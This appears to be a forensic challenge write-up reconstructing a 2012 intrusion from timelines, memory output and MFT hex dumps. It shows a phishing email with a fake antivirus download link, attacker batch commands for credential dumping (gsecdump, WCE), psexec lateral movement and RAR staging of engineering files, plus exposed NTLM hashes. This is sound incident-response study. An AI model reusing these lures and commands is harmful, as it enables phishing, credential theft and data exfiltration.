                                                    00004c0: 3137 4631 4535 3235 3246 4138 3745 4434  17F1E5252FA87ED4
                                                    00004d0: 3041 4638 4334 3644 3842 3145 320d 0a73  0AF8C46D8B1E2..s
                                                    00004e0: 7973 6261 636b 7570 3a63 7572 7265 6e74  ysbackup:current
                                                    00004f0: 3a43 3241 3339 3135 4446 3245 4337 3945  :C2A3915DF2EC79E
                                                    0000500: 4537 3331 3038 4542 3438 3037 3341 4342  E73108EB48073ACB
                                                    0000510: 373a 4537 4136 4632 3730 4631 4241 3536  7:E7A6F270F1BA56
                                                    0000520: 3241 3930 4532 4331 3333 4139 3544 3230  2A90E2C133A95D20
                                                    0000530: 3537 0d0a 0000 0000 ffff ffff 8279 4711  57...........yG.

                                                    dfir-challenge-FLD-SARIYADH-43

                                                    Timeline


                                                    User downloads and executes the dropper, as shown by the creation of its prefetch file.  The backdoor is placed on the machine.

                                                    Tue Nov 27 2012 00:17:58   100895 .ac. r/rr-xr-xr-x 0        0        12010-128-4 c:/WINDOWS/system32/6to4ex.dll
                                                                                            22270 macb r/rrwxrwxrwx 0        0        12011-128-4 c:/WINDOWS/Prefetch/SYMANTEC-1.43-1[2].EXE-330FB7E3.pf

                                                    Tool drop directory is created

                                                    Tue Nov 27 2012 00:18:31       56 ...b d/drwxrwxrwx 0        0        7555-144-5 c:/WINDOWS/webui

                                                    Tools being placed on the system

                                                    Tue Nov 27 2012 00:20:06   381816 macb r/rrwxrwxrwx 0        0        12000-128-3 c:/WINDOWS/ps.exe
                                                    Tue Nov 27 2012 00:20:33   303104 macb r/rrwxrwxrwx 0        0        12005-128-3 c:/WINDOWS/webui/gs.exe
                                                    Tue Nov 27 2012 00:20:36   381816 ...b r/rrwxrwxrwx 0        0        12012-128-3 c:/WINDOWS/webui/ps.exe
                                                    Tue Nov 27 2012 00:20:37   381816 m.c. r/rrwxrwxrwx 0        0        12012-128-3 c:/WINDOWS/webui/ps.exe
                                                    Tue Nov 27 2012 00:20:39   403968 ...b r/rrwxrwxrwx 0        0        12013-128-3 c:/WINDOWS/webui/ra.exe
                                                    Tue Nov 27 2012 00:20:40   403968 mac. r/rrwxrwxrwx 0        0        12013-128-3 c:/WINDOWS/webui/ra.exe
                                                    Tue Nov 27 2012 00:20:42    20480 macb r/rrwxrwxrwx 0        0        12014-128-3 c:/WINDOWS/webui/sl.exe
                                                    Tue Nov 27 2012 00:20:46   208384 m.cb r/rrwxrwxrwx 0        0        12015-128-3 c:/WINDOWS/webui/wc.exe
                                                                                                   208384 m... r/rrwxrwxrwx 0        0        12031-128-3 c:/WINDOWS/system32/wc.exe

                                                    ipconfig is run and at the same time netuse.dll is created

                                                    Tue Nov 27 2012 00:21:12    10454 ...b r/rrwxrwxrwx 0        0        12016-128-3 c:/WINDOWS/webui/netuse.dll
                                                                                                   55808 .a.. r/rrwxrwxrwx 0        0        24195-128-3 c:/WINDOWS/system32/ipconfig.exe

                                                    net commands, scanline and gsecdump are all run.  netuse.dll is modified

                                                    Tue Nov 27 2012 00:21:26    14550 ...b r/rrwxrwxrwx 0        0        12018-128-4 c:/WINDOWS/Prefetch/NET.EXE-01A53C2F.pf
                                                    Tue Nov 27 2012 00:21:41    14116 ...b r/rrwxrwxrwx 0        0        12019-128-4 c:/WINDOWS/Prefetch/NET1.EXE-029B9DB4.pf
                                                    Tue Nov 27 2012 00:23:09     6768 macb r/rrwxrwxrwx 0        0        12020-128-4 c:/WINDOWS/Prefetch/SL.EXE-010E2A23.pf
                                                    Tue Nov 27 2012 00:23:35    10454 mac. r/rrwxrwxrwx 0        0        12016-128-3 c:/WINDOWS/webui/netuse.dll
                                                                                                    9990 macb r/rrwxrwxrwx 0        0        12021-128-4 c:/WINDOWS/Prefetch/GS.EXE-3796DDD9.pf
                                                                                                    415744 .a.. r/rrwxrwxrwx 0        0        23442-128-3 c:/WINDOWS/system32/samsrv.dll

                                                    wc.exe (Windows Credentials Editor) is executed

                                                    Tue Nov 27 2012 00:24:18    13084 ...b r/rrwxrwxrwx 0        0        12022-128-4 c:/WINDOWS/Prefetch/WC.EXE-21AD5E60.pf

                                                    psexec is executed

                                                    Tue Nov 27 2012 00:27:21    10330 ...b r/rrwxrwxrwx 0        0        12023-128-4 c:/WINDOWS/Prefetch/PS.EXE-3A0FA6F9.pf

                                                    system1.bat is created

                                                    Tue Nov 27 2012 00:31:39       91 ...b r/rrwxrwxrwx 0        0        12024-128-4 c:/WINDOWS/system1.bat

                                                    psexec is run a second time

                                                    Tue Nov 27 2012 00:33:32     9866 ...b r/rrwxrwxrwx 0        0        12025-128-4 c:/WINDOWS/Prefetch/PS.EXE-09745CC1.pf

                                                    system1.bat is modified

                                                    Tue Nov 27 2012 00:43:34       91 mac. r/rrwxrwxrwx 0        0        12024-128-4 c:/WINDOWS/system1.bat

                                                    system6.bat is created

                                                    Tue Nov 27 2012 00:43:45      184 macb r/rrwxrwxrwx 0        0        12026-128-1 c:/WINDOWS/system6.bat

                                                    psexec is run again

                                                    Tue Nov 27 2012 00:44:16     9866 mac. r/rrwxrwxrwx 0        0        12025-128-4 c:/WINDOWS/Prefetch/PS.EXE-09745CC1.pf

                                                    Additional bat scripts are placed on the machine

                                                    Tue Nov 27 2012 00:53:29       69 ...b r/rrwxrwxrwx 0        0        12027-128-3 c:/WINDOWS/webui/system2.bat
                                                    Tue Nov 27 2012 00:56:18       69 mac. r/rrwxrwxrwx 0        0        12027-128-3 c:/WINDOWS/webui/system2.bat
                                                    Tue Nov 27 2012 00:59:00       56 macb r/rrwxrwxrwx 0        0        12028-128-1 c:/WINDOWS/webui/system3.bat
                                                    Tue Nov 27 2012 01:04:59      131 ...b r/rrwxrwxrwx 0        0        12029-128-3 c:/WINDOWS/webui/system4.bat

                                                    system4.bat is modified

                                                    Tue Nov 27 2012 01:11:00      131 mac. r/rrwxrwxrwx 0        0        12029-128-3 c:/WINDOWS/webui/system4.bat

                                                    system5.bat appears on the machine

                                                    Tue Nov 27 2012 01:19:41       88 ...b r/rrwxrwxrwx 0        0        12030-128-3 c:/WINDOWS/webui/system5.bat
                                                                                                     56 mac. d/drwxrwxrwx 0        0        7555-144-5 c:/WINDOWS/webui
                                                    Tue Nov 27 2012 01:21:07       88 mac. r/rrwxrwxrwx 0        0        12030-128-3 c:/WINDOWS/webui/system5.bat

                                                    A scheduled task is created

                                                    Tue Nov 27 2012 01:21:18   208384 .a.. r/rrwxrwxrwx 0        0        12015-128-3 c:/WINDOWS/webui/wc.exe
                                                                                                 208384 ...b r/rrwxrwxrwx 0        0        12031-128-3 c:/WINDOWS/system32/wc.exe
                                                                                                        322 ...b r/rrwxrwxrwx 0        0        12032-128-1 c:/WINDOWS/Tasks/At1.job
                                                                                                    12960 ...b r/rrwxrwxrwx 0        0        12033-128-4 c:/WINDOWS/Prefetch/AT.EXE-2770DD18.pf
                                                                                                   25088 .a.. r/rrwxrwxrwx 0        0        24481-128-3 c:/WINDOWS/system32/at.exe
                                                                                                    344 m.c. d/drwxrwxrwx 0        0        5458-144-1 c:/WINDOWS/Tasks

                                                    psexec is again executed

                                                    Tue Nov 27 2012 01:22:07   381816 .a.. r/rrwxrwxrwx 0        0        12012-128-3 c:/WINDOWS/webui/ps.exe

                                                    wc.exe is run once again

                                                    Tue Nov 27 2012 01:23:23    13084 mac. r/rrwxrwxrwx 0        0        12022-128-4 c:/WINDOWS/Prefetch/WC.EXE-21AD5E60.pf

                                                    psexec is run again

                                                    Tue Nov 27 2012 01:24:20    10330 mac. r/rrwxrwxrwx 0        0        12023-128-4 c:/WINDOWS/Prefetch/PS.EXE-3A0FA6F9.pf

                                                    A net command is executed

                                                    Tue Nov 27 2012 01:27:31    14116 mac. r/rrwxrwxrwx 0        0        12019-128-4 c:/WINDOWS/Prefetch/NET1.EXE-029B9DB4.pf
                                                                                                    124928 .a.. r/rrwxrwxrwx 0        0        23983-128-3 c:/WINDOWS/system32/net1.exe
                                                                                                      42496 .a.. r/rrwxrwxrwx 0        0        23984-128-3 c:/WINDOWS/system32/net.exe

                                                    Scheduled task is executed

                                                    Tue Nov 27 2012 01:30:00   208384 .ac. r/rrwxrwxrwx 0        0        12031-128-3 c:/WINDOWS/system32/wc.exe
                                                                                                      322 mac. r/rrwxrwxrwx 0        0        12032-128-1 c:/WINDOWS/Tasks/At1.job
                                                                                                     268 macb r/rrwxrwxrwx 0        0        12034-128-1 c:/WINDOWS/system32/h.out

                                                    WCE is executed as a result of the at job running

                                                    Tue Nov 27 2012 01:30:10    10720 macb r/rrwxrwxrwx 0        0        12035-128-4 c:/WINDOWS/Prefetch/WC.EXE-06BFE764.pf

                                                    Responder activity

                                                    Tue Nov 27 2012 01:42:21    95104 m... r/rrwxrwxrwx 0        0        12037-128-3 c:/Documents and Settings/amirs/mdd.exe
                                                                                                   95104 m... r/rrwxrwxrwx 0        0        12038-128-3 c:/mdd.exe

                                                    Memory Analysis


                                                    Phishing email in memory

                                                    368906260 ceived: from ubuntu-router ([172.16.150.8]) by dc-ustxhou.petro-market.org with Microsoft SMTPSVC(6.0.3790.0);
                                                     368906372       Mon, 26 Nov 2012 14:00:08 -0600
                                                     368906407 Received: from d0793h (d0793h.petro-markets.info [58.64.132.141])
                                                     368906474      by ubuntu-router (8.14.3/8.14.3/Debian-9.2ubuntu1) with SMTP id qAQK06Co005842;
                                                     368906556      Mon, 26 Nov 2012 15:00:07 -0500
                                                     368906590 Message-ID: <FCE1C36C7BBC46AFB7C2A251EA868B8B@d0793h>
                                                     368906645 From: "Security Department" <isd@petro-markets.info>
                                                     368906699 To: <amirs@petro-market.org>, <callb@petro-market.org>,
                                                     368906756         <wrightd@petro-market.org>
                                                     368906792 Subject: Immediate Action
                                                     368906819 Date: Mon, 26 Nov 2012 14:59:38 -0500
                                                     368906858 MIME-Version: 1.0
                                                     368906877 Content-Type: multipart/alternative;
                                                     368906915      boundary="----=_NextPart_000_0015_01CDCBE6.A7B92DE0"
                                                     368906970 X-Priority: 3
                                                     368906985 X-MSMail-Priority: Normal
                                                     368907012 X-Mailer: Microsoft Outlook Express 6.00.2900.5512
                                                     368907064 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.5512
                                                     368907122 Return-Path: isd@petro-markets.info
                                                     368907159 X-OriginalArrivalTime: 26 Nov 2012 20:00:08.0432 (UTC) FILETIME=[A2ABBF00:01CDCC10]
                                                     368907246 This is a multi-part message in MIME format.
                                                     368907294 ------=_NextPart_000_0015_01CDCBE6.A7B92DE0
                                                     368907339 Content-Type: text/plain;
                                                     368907366      charset="iso-8859-1"
                                                     368907389 Content-Transfer-Encoding: quoted-printable
                                                     368907436 Attn: Immediate Action is Required!!
                                                     368907476 The IS department is requiring that all associates update to the new =
                                                     368907548 version of anti-virus.  This is critical and must be done ASAP!  Failure =
                                                     368907624 to update anti-virus may result in negative actions.
                                                     368907680 Please download the new anti-virus and follow the instructions.  Failure =
                                                     368907756 to install this anti-virus may result in loosing your job!
                                                     368907818 Please donwload at http://58.64.132.8/download/Symantec-1.43-1.exe
                                                     368907888 Regards,
                                                     368907898 The IS Department

                                                    Volatility connscan output shows the C2 connection as well as connections to IIS-SARIYADH-03

                                                    Offset(P)  Local Address             Remote Address            Pid
                                                    ---------- ------------------------- ------------------------- ---
                                                    0x01fb0d48 172.16.223.187:2109       172.16.150.10:389         640
                                                    0x02023638 172.16.223.187:1265       58.64.132.141:80          1032
                                                    0x02035ae8 172.16.223.187:1259       172.16.150.10:445         4
                                                    0x02080930 172.16.223.187:1261       172.16.150.10:135         1032
                                                    0x020859d0 172.16.223.187:1210       172.16.223.47:445         4
                                                    0x020f0d38 172.16.223.187:2179       172.16.150.10:1025        696
                                                    0x0230d448 172.16.223.187:1241       172.16.150.10:389         632
                                                    0x0770fd48 172.16.223.187:2109       172.16.150.10:389         640
                                                    0x0836a638 172.16.223.187:1265       58.64.132.141:80          1032
                                                    0x084c7930 172.16.223.187:1261       172.16.150.10:135         1032
                                                    0x084ec9d0 172.16.223.187:1210       172.16.223.47:445         4
                                                    0x08594448 172.16.223.187:1241       172.16.150.10:389         632
                                                    0x09b5cae8 172.16.223.187:1259       172.16.150.10:445         4
                                                    0x0ac37d38 172.16.223.187:2179       172.16.150.10:1025        696
                                                    0x16066d48 172.16.223.187:2109       172.16.150.10:389         640
                                                    0x164d3638 172.16.223.187:1265       58.64.132.141:80          1032
                                                    0x16610930 172.16.223.187:1261       172.16.150.10:135         1032
                                                    0x16c559d0 172.16.223.187:1210       172.16.223.47:445         4
                                                    0x1869d448 172.16.223.187:1241       172.16.150.10:389         632
                                                    0x197a5ae8 172.16.223.187:1259       172.16.150.10:445         4
                                                    0x1a32ad38 172.16.223.187:2179       172.16.150.10:1025        696
                                                    0x1f209d48 172.16.223.187:2109       172.16.150.10:389         640

                                                    The Volatility pslist plugin shows the backdoor running in svchost.exe.  There are also psexec processes running, as well as wce and cmd.exe processes with a PPID of 1032.

                                                    Offset(V)  Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                Exit                
                                                    ---------- -------------------- ------ ------ ------ -------- ------ ------ -------------------- --------------------
                                                    0x823c8830 System                    4      0     51      287 ------      0                                          
                                                    0x82274b90 smss.exe                544      4      3       19 ------      0 2012-11-26 22:01:51                      
                                                    0x82238da0 csrss.exe               608    544     13      387      0      0 2012-11-26 22:01:52                      
                                                    0x82214da0 winlogon.exe            632    544     17      652      0      0 2012-11-26 22:01:52                      
                                                    0x822ba638 services.exe            684    632     16      256      0      0 2012-11-26 22:01:53                      
                                                    0x822ab2d8 lsass.exe               696    632     20      411      0      0 2012-11-26 22:01:53                      
                                                    0x82244460 svchost.exe             860    684     14      188      0      0 2012-11-26 22:01:54                      
                                                    0x8217cb10 svchost.exe             944    684      9      261      0      0 2012-11-26 22:01:55                      
                                                    0x8228fda0 svchost.exe            1032    684     77     1558      0      0 2012-11-26 22:01:55                      
                                                    0x821753d8 svchost.exe            1076    684      6       84      0      0 2012-11-26 22:01:55                      
                                                    0x821bac10 svchost.exe            1128    684     14      249      0      0 2012-11-26 22:01:56                      
                                                    0x821b4a78 spoolsv.exe            1360    684      9      104      0      0 2012-11-26 22:01:58                      
                                                    0x82043da0 alg.exe                1888    684      6      104      0      0 2012-11-26 22:01:59                      
                                                    0x82223950 explorer.exe            296    260      9      366      0      0 2012-11-26 22:02:26                      
                                                    0x82226a20 msmsgs.exe              660    296      3      204      0      0 2012-11-26 22:02:32                      
                                                    0x821d43c0 ctfmon.exe              700    296      1       75      0      0 2012-11-26 22:02:32                      
                                                    0x821e8918 wuauclt.exe            1616   1032      3      142      0      0 2012-11-26 22:03:07                      
                                                    0x821d6598 msimn.exe              1984    296      7      361      0      0 2012-11-26 22:07:13                      
                                                    0x82034b40 cmd.exe                 456   1032      0 --------      0      0 2012-11-27 00:18:21  2012-11-27 00:27:30 
                                                    0x8230dc88 ps.exe                 1448    456      1       44      0      0 2012-11-27 00:27:11                      
                                                    0x820297b8 cmd.exe                1048   1032      0 --------      0      0 2012-11-27 00:27:41  2012-11-27 01:22:20 
                                                    0x821f7da0 ps.exe                 1052   1048      2       60      0      0 2012-11-27 01:11:17                      
                                                    0x82228da0 cmd.exe                 356   1032      0 --------      0      0 2012-11-27 01:16:33  2012-11-27 01:22:17 
                                                    0x81ffb2a0 ps.exe                  228    356      2       65      0      0 2012-11-27 01:22:07                      
                                                    0x820001e0 wc.exe                 1992   1032      1       27      0      0 2012-11-27 01:30:00                      
                                                    0x82004918 cmd.exe                1860    296      1       33      0      0 2012-11-27 01:42:52                      
                                                    0x8221d5a8 mdd.exe                 988   1860      1       24      0      0 2012-11-27 01:46:00

                                                    The Volatility dlllist plugin shows our backdoor loaded in PID 1032

                                                    0x10000000    0x1c000 c:\windows\system32\6to4ex.dll

                                                    Successful privilege escalation to the sysbackup user via WCE


                                                    148200795 C:\WINDOWS\webui>
                                                    148202516 v1.3beta (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
                                                    148202638 Use -h for help.
                                                    148202658 Changing NTLM credentials of current logon session (000003E7h) to:
                                                    148202726 Username: sysbackup
                                                    148202747 domain: current
                                                    148202764 LMHash: c2a3915df2ec79ee73108eb48073acb7
                                                    148202806 NTHash: e7a6f270f1ba562a90e2c133a95d2057
                                                    148202848 NTLM credentials successfully changed!
                                                    148202890 C:\WINDOWS\webui>

                                                    Attempts to run system1.bat against IIS-SARIYADH-03


                                                    442240521 Starting c:\windows\system1.bat on 172.16.223.47...
                                                    442240577 system1.bat exited on 172.16.223.47 with error code 1.


                                                    MFT entry for system1.bat


                                                    0000300: 4649 4c45 3000 0300 d198 5a05 0000 0000  FILE0.....Z.....
                                                    0000310: 0400 0100 3800 0100 8801 0000 0004 0000  ....8...........
                                                    0000320: 0000 0000 0000 0000 0500 0000 f82e 0000  ................
                                                    0000330: 0900 0000 0000 0000 1000 0000 6000 0000  ............`...
                                                    0000340: 0000 0000 0000 0000 4800 0000 1800 0000  ........H.......
                                                    0000350: 512b 1191 36cc cd01 16df f33a 38cc cd01  Q+..6......:8...
                                                    0000360: 16df f33a 38cc cd01 16df f33a 38cc cd01  ...:8......:8...
                                                    0000370: 2000 0000 0000 0000 0000 0000 0000 0000   ...............
                                                    0000380: 0000 0000 1301 0000 0000 0000 0000 0000  ................
                                                    0000390: 0000 0000 0000 0000 3000 0000 7000 0000  ........0...p...
                                                    00003a0: 0000 0000 0000 0200 5800 0000 1800 0100  ........X.......
                                                    00003b0: 1c00 0000 0000 0100 512b 1191 36cc cd01  ........Q+..6...
                                                    00003c0: 512b 1191 36cc cd01 512b 1191 36cc cd01  Q+..6...Q+..6...
                                                    00003d0: 512b 1191 36cc cd01 0000 0000 0000 0000  Q+..6...........
                                                    00003e0: 0000 0000 0000 0000 2000 0000 0000 0000  ........ .......
                                                    00003f0: 0b03 7300 7900 7300 7400 6500 6d00 3100  ..s.y.s.t.e.m.1.
                                                    0000400: 2e00 6200 6100 7400 8000 0000 7800 0000  ..b.a.t.....x...
                                                    0000410: 0000 1800 0000 0400 5b00 0000 1800 0000  ........[.......
                                                    0000420: 4065 6368 6f20 6f66 660d 0a6d 6b64 6972  @echo off..mkdir
                                                    0000430: 2063 3a5c 7769 6e64 6f77 735c 7765 6275   c:\windows\webu
                                                    0000440: 690d 0a6e 6574 2073 6861 7265 207a 3d63  i..net share z=c
                                                    0000450: 3a5c 7769 6e64 6f77 735c 7765 6275 6920  :\windows\webui 
                                                    0000460: 2f47 5241 4e54 3a73 7973 6261 636b 7570  /GRANT:sysbackup
                                                    0000470: 2c46 554c 4c0d 0a0d 0a0d 0a6e 6669 6720  ,FULL......nfig 
                                                    0000480: ffff ffff 8279 4711 633a 5c77 696e 646f  .....yG.c:\windo
                                                    0000490: 7773 5c77 6562 7569 5c73 7973 7465 6d2e  ws\webui\system.
                                                    00004a0: 646c 6c0d 0a6e 6574 2073 6861 7265 203e  dll..net share >
                                                    00004b0: 3e20 633a 5c77 696e 646f 7773 5c77 6562  > c:\windows\web
                                                    00004c0: 7569 5c73 7973 7465 6d2e 646c 6c0d 0a6e  ui\system.dll..n
                                                    00004d0: 6574 2073 7461 7274 203e 3e20 633a 5c77  et start >> c:\w
                                                    00004e0: 696e 646f 7773 5c77 6562 7569 5c73 7973  indows\webui\sys
                                                    00004f0: 7465 6d2e 646c 6c0d 0a6e 6574 2076 6965  tem.dll..net vie
                                                    0000500: 7720 3e3e 2063 3a5c 7769 6e64 6f77 735c  w >> c:\windows\
                                                    0000510: 7765 6275 695c 7379 7374 656d 2e64 6c6c  webui\system.dll
                                                    0000520: 0d0a 0d0a 0000 0000 ffff ffff 8279 4711  .............yG.

                                                    system2.bat being executed against IIS-SARIYADH-03

                                                    \WINDOWS\System32\svchost.exe - ps \\172.16.223.47 -accepteula -c c:\windows\system2.bat

                                                    mft entry for system2.bat


                                                    0000340: 0000 0000 0000 0000 4649 4c45 3000 0300  ........FILE0...
                                                    0000350: 5632 5b05 0000 0000 0300 0100 3800 0100  V2[.........8...
                                                    0000360: 7001 0000 0004 0000 0000 0000 0000 0000  p...............
                                                    0000370: 0400 0000 fb2e 0000 0300 0000 0000 0000  ................
                                                    0000380: 1000 0000 6000 0000 0000 0000 0000 0000  ....`...........
                                                    0000390: 4800 0000 1800 0000 9016 789d 39cc cd01  H.........x.9...
                                                    00003a0: 98f9 4b02 3acc cd01 98f9 4b02 3acc cd01  ..K.:.....K.:...
                                                    00003b0: 98f9 4b02 3acc cd01 2000 0000 0000 0000  ..K.:... .......
                                                    00003c0: 0000 0000 0000 0000 0000 0000 1301 0000  ................
                                                    00003d0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
                                                    00003e0: 3000 0000 7000 0000 0000 0000 0000 0200  0...p...........
                                                    00003f0: 5800 0000 1800 0100 831d 0000 0000 0200  X...............
                                                    0000400: 9016 789d 39cc cd01 9016 789d 39cc cd01  ..x.9.....x.9...
                                                    0000410: 9016 789d 39cc cd01 9016 789d 39cc cd01  ..x.9.....x.9...
                                                    0000420: 0000 0000 0000 0000 0000 0000 0000 0000  ................
                                                    0000430: 2000 0000 0000 0000 0b03 7300 7900 7300   .........s.y.s.
                                                    0000440: 7400 6500 6d00 3200 2e00 6200 6100 7400  t.e.m.2...b.a.t.
                                                    0000450: 8000 0000 6000 0000 0000 1800 0000 0300  ....`...........
                                                    0000460: 4500 0000 1800 0000 4065 6368 6f20 6f66  E.......@echo of
                                                    0000470: 660d 0a63 3a5c 7769 6e64 6f77 735c 7765  f..c:\windows\we
                                                    0000480: 6275 695c 6773 2e65 7865 202d 6120 3e3e  bui\gs.exe -a >>
                                                    0000490: 2063 3a5c 7769 6e64 6f77 735c 7765 6275   c:\windows\webu
                                                    00004a0: 695c 7376 6368 6f73 742e 646c 6c73 742e  i\svchost.dllst.
                                                    00004b0: ffff ffff 8279 4711 ffff ffff 8279 4711  .....yG

                                                    mft entry for system3.bat


                                                    0000380: 0000 0000 0000 0000 4649 4c45 3000 0300  ........FILE0...
                                                    0000390: 6356 5b05 0000 0000 0300 0100 3800 0100  cV[.........8...
                                                    00003a0: 6001 0000 0004 0000 0000 0000 0000 0000  `...............
                                                    00003b0: 0300 0000 fc2e 0000 0800 0000 0000 0000  ................
                                                    00003c0: 1000 0000 6000 0000 0000 0000 0000 0000  ....`...........
                                                    00003d0: 4800 0000 1800 0000 6783 2063 3acc cd01  H.......g. c:...
                                                    00003e0: c2e5 2263 3acc cd01 c2e5 2263 3acc cd01  .."c:....."c:...
                                                    00003f0: c2e5 2263 3acc cd01 2000 0000 0000 0000  .."c:... .......
                                                    0000400: 0000 0000 0000 0000 0000 0000 1301 0000  ................
                                                    0000410: 0000 0000 0000 0000 0000 0000 0000 0000  ................
                                                    0000420: 3000 0000 7000 0000 0000 0000 0000 0200  0...p...........
                                                    0000430: 5800 0000 1800 0100 831d 0000 0000 0200  X...............
                                                    0000440: 6783 2063 3acc cd01 6783 2063 3acc cd01  g. c:...g. c:...
                                                    0000450: 6783 2063 3acc cd01 6783 2063 3acc cd01  g. c:...g. c:...
                                                    0000460: 0000 0000 0000 0000 0000 0000 0000 0000  ................
                                                    0000470: 2000 0000 0000 0000 0b03 7300 7900 7300   .........s.y.s.
                                                    0000480: 7400 6500 6d00 3300 2e00 6200 6100 7400  t.e.m.3...b.a.t.
                                                    0000490: 8000 0000 5000 0000 0000 1800 0000 0100  ....P...........
                                                    00004a0: 3800 0000 1800 0000 4065 6368 6f20 6f66  8.......@echo of
                                                    00004b0: 6620 0d0a 6469 7220 2f53 2043 3a5c 2a2e  f ..dir /S C:\*.
                                                    00004c0: 6477 6720 3e20 633a 5c77 696e 646f 7773  dwg > c:\windows
                                                    00004d0: 5c77 6562 7569 5c68 7474 7073 2e64 6c6c  \webui\https.dll
                                                    00004e0: ffff ffff 8279 4711 0000 0000 0000 0000  .....yG.

                                                    system4.bat being executed against IIS-SARIYADH-03

                                                    480667072 ps \\172.16.223.47 -accepteula -c c:\windows\webui\system4.bat

                                                    mft entry for system4.bat


                                                    00003a0: 4649 4c45 3000 0300 afd8 5b05 0000 0000  FILE0.....[.....
                                                    00003b0: 0300 0100 3800 0100 b001 0000 0004 0000  ....8...........
                                                    00003c0: 0000 0000 0000 0000 0400 0000 fd2e 0000  ................
                                                    00003d0: 0700 0000 0000 0000 1000 0000 6000 0000  ............`...
                                                    00003e0: 0000 0000 0000 0000 4800 0000 1800 0000  ........H.......
                                                    00003f0: 655b c338 3bcc cd01 7011 e20f 3ccc cd01  e[.8;...p...<...
                                                    0000400: 7011 e20f 3ccc cd01 7011 e20f 3ccc cd01  p...<...p...<...
                                                    0000410: 2000 0000 0000 0000 0000 0000 0000 0000   ...............
                                                    0000420: 0000 0000 1301 0000 0000 0000 0000 0000  ................
                                                    0000430: 0000 0000 0000 0000 3000 0000 7000 0000  ........0...p...
                                                    0000440: 0000 0000 0000 0200 5800 0000 1800 0100  ........X.......
                                                    0000450: 831d 0000 0000 0200 655b c338 3bcc cd01  ........e[.8;...
                                                    0000460: 655b c338 3bcc cd01 655b c338 3bcc cd01  e[.8;...e[.8;...
                                                    0000470: 655b c338 3bcc cd01 0000 0000 0000 0000  e[.8;...........
                                                    0000480: 0000 0000 0000 0000 2000 0000 0000 0000  ........ .......
                                                    0000490: 0b03 7300 7900 7300 7400 6500 6d00 3400  ..s.y.s.t.e.m.4.
                                                    00004a0: 2e00 6200 6100 7400 8000 0000 a000 0000  ..b.a.t.........
                                                    00004b0: 0000 1800 0000 0300 8300 0000 1800 0000  ................
                                                    00004c0: 4065 6368 6f20 6f66 6620 0d0a 633a 5c77  @echo off ..c:\w
                                                    00004d0: 696e 646f 7773 5c77 6562 7569 5c72 612e  indows\webui\ra.
                                                    00004e0: 6578 6520 6120 2d68 7068 636c 6c6c 7364  exe a -hphclllsd
                                                    00004f0: 646c 7364 6964 646b 6c6c 6a68 202d 7220  dlsdiddklljh -r 
                                                    0000500: 633a 5c77 696e 646f 7773 5c77 6562 7569  c:\windows\webui
                                                    0000510: 5c6e 6574 7374 6174 2e64 6c6c 2022 433a  \netstat.dll "C:
                                                    0000520: 5c45 6e67 696e 6565 7269 6e67 5c44 6573  \Engineering\Des
                                                    0000530: 6967 6e73 5c50 756d 7073 2220 2d78 2a2e  igns\Pumps" -x*.
                                                    0000540: 646c 6cff 8279 4711 ffff ffff 8279 4711  dll..yG.

                                                    At1.job executing wc.exe

                                                    70379040 "At1.job" (wc.exe)
                                                    70379080      Started 11/27/2012 4:30:00 AM



                                                    system5.bat being executed against IIS-SARIYADH-03

                                                    426451324 \WINDOWS\System32\svchost.exe - ps \\172.16.223.47 -accepteula -c c:\windows\webui\system5.bat

                                                    mft entry for system5.bat


                                                    00002f0: 0000 0000 0000 4649 4c45 3000 0300 3d66  ......FILE0...=f
                                                    0000300: 5c05 0000 0000 0400 0100 3800 0100 8001  \.........8.....
                                                    0000310: 0000 0004 0000 0000 0000 0000 0000 0400  ................
                                                    0000320: 0000 fe2e 0000 0400 0000 0000 0000 1000  ................
                                                    0000330: 0000 6000 0000 0000 0000 0000 0000 4800  ..`...........H.
                                                    0000340: 0000 1800 0000 e589 9246 3dcc cd01 4288  .........F=...B.
                                                    0000350: ce79 3dcc cd01 4288 ce79 3dcc cd01 4288  .y=...B..y=...B.
                                                    0000360: ce79 3dcc cd01 2000 0000 0000 0000 0000  .y=... .........
                                                    0000370: 0000 0000 0000 0000 0000 1301 0000 0000  ................
                                                    0000380: 0000 0000 0000 0000 0000 0000 0000 3000  ..............0.
                                                    0000390: 0000 7000 0000 0000 0000 0000 0200 5800  ..p...........X.
                                                    00003a0: 0000 1800 0100 831d 0000 0000 0200 e589  ................
                                                    00003b0: 9246 3dcc cd01 e589 9246 3dcc cd01 e589  .F=......F=.....
                                                    00003c0: 9246 3dcc cd01 e589 9246 3dcc cd01 0000  .F=......F=.....
                                                    00003d0: 0000 0000 0000 0000 0000 0000 0000 2000  .............. .
                                                    00003e0: 0000 0000 0000 0b03 7300 7900 7300 7400  ........s.y.s.t.
                                                    00003f0: 6500 6d00 3500 2e00 6200 6100 7400 8000  e.m.5...b.a.t...
                                                    0000400: 0000 7000 0000 0000 1800 0000 0300 5800  ..p...........X.
                                                    0000410: 0000 1800 0000 4065 6368 6f20 6f66 660d  ......@echo off.
                                                    0000420: 0a63 6f70 7920 633a 5c77 696e 646f 7773  .copy c:\windows
                                                    0000430: 5c77 6562 7569 5c77 632e 6578 6520 633a  \webui\wc.exe c:
                                                    0000440: 5c77 696e 646f 7773 5c73 7973 7465 6d33  \windows\system3
                                                    0000450: 320d 0a61 7420 3034 3a33 3020 7763 2e65  2..at 04:30 wc.e
                                                    0000460: 7865 202d 6520 2d6f 2068 2e6f 7574 ffff  xe -e -o h.out..
                                                    0000470: ffff 8279 4711 0000 0000 0000 0000 0000  ...yG

                                                    mft entry for h.out


                                                    0000260: 4649 4c45 3000 0300 e654 5d05 0000 0000  FILE0....T].....
                                                    0000270: 0500 0100 3800 0100 3002 0000 0004 0000  ....8...0.......
                                                    0000280: 0000 0000 0000 0000 0300 0000 022f 0000  ............./..
                                                    0000290: 0500 0000 0000 0000 1000 0000 6000 0000  ............`...
                                                    00002a0: 0000 0000 0000 0000 4800 0000 1800 0000  ........H.......
                                                    00002b0: 6168 88b7 3ecc cd01 6168 88b7 3ecc cd01  ah..>...ah..>...
                                                    00002c0: 6168 88b7 3ecc cd01 6168 88b7 3ecc cd01  ah..>...ah..>...
                                                    00002d0: 2000 0000 0000 0000 0000 0000 0000 0000   ...............
                                                    00002e0: 0000 0000 c806 0000 0000 0000 0000 0000  ................
                                                    00002f0: 0000 0000 0000 0000 3000 0000 6800 0000  ........0...h...
